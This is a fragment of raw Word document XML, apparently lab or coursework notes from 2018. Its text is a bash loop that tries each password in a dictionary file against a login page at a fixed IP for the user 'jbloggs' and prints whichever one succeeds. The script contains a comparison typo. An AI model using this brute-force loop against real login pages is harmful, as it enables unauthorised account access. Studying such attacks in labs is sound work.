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F89F4" w:rsidRDefault="1E7F89F4" w14:noSpellErr="1" w14:paraId="3E2D9034" w14:textId="1B383802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for password in $(cat dictionary.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E7F89F4" w:rsidRDefault="1E7F89F4" w14:noSpellErr="1" w14:paraId="455790DE" w14:textId="111B4934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do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E7F89F4" w:rsidRDefault="1E7F89F4" w14:paraId="1F16D5D4" w14:textId="637ECAC4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textstring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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3c7889a3eb284ecf">
        <w:r w:rsidRPr="1E7F89F4" w:rsidR="1E7F89F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http://18.202.140.65/login.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="1E7F89F4" w:rsidRDefault="1E7F89F4" w14:paraId="6D68F299" w14:textId="67BFC4D5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--post-data=username=</w:t>
      </w:r>
      <w:proofErr w:type="spell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jbloggs&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=$password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E7F89F4" w:rsidRDefault="1E7F89F4" w14:paraId="11302C8B" w14:textId="64615DFC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E7F89F4" w:rsidRDefault="1E7F89F4" w14:paraId="02A0155A" w14:textId="2C38D414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wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-O result $</w:t>
      </w:r>
      <w:proofErr w:type="spell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textstring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="1E7F89F4" w:rsidRDefault="1E7F89F4" w14:noSpellErr="1" w14:paraId="0B69418D" w14:textId="43DBA408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if [ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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$( grep</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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-c success result) -ep 1 ]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E7F89F4" w:rsidRDefault="1E7F89F4" w14:noSpellErr="1" w14:paraId="408B104B" w14:textId="7FEDFB05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then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E7F89F4" w:rsidRDefault="1E7F89F4" w14:noSpellErr="1" w14:paraId="720D7983" w14:textId="3CAB3B97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echo $password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E7F89F4" w:rsidRDefault="1E7F89F4" w14:noSpellErr="1" w14:paraId="5BBD104C" w14:textId="333882A2"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E7F89F4" w:rsidP="1E7F89F4" w:rsidRDefault="1E7F89F4" w14:paraId="77BCC9F4" w14:textId="7DB09301">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="1E7F89F4" w:rsidR="1E7F89F4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>done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15539E"/>
  <w15:docId w15:val="{8d7ff5b1-0dae-4fde-9694-70f8f320fe8c}"/>
  <w:rsids>
    <w:rsidRoot w:val="1E7F89F4"/>
    <w:rsid w:val="1E7F89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8.202.140.65/login.php" TargetMode="External" Id="R3c7889a3eb28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eoin dalton</lastModifiedBy>
  <revision>2</revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-05T12:07:46.5268883Z</dcterms:modified>
</coreProperties>
</file>